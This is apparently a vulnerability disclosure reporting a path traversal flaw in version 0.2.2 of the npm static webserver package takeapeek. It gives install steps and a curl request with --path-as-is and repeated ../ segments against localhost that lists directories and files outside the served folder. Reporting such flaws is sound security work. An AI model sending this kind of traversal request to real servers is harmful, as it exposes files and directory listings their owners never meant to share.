I would like to report Path Travelsal in takeapeek
It allows attacker to list directory and files.
module name: takeapeekversion:0.2.2npm page: https://www.npmjs.com/package/takeapeek
A simple static webserver with only one command. Heavily inspired by glance, this is really more of a learning experience then anything.
~100 downloads per month
Attacker was able to exploit path traversal and view sensitive directory and files.
npm i takeapeek
node node_modules/takeapeek/dist/bin.js
curl --path-as-is http://localhost:3141/../../../../../../
F340897
It allows attacker to list directory and files.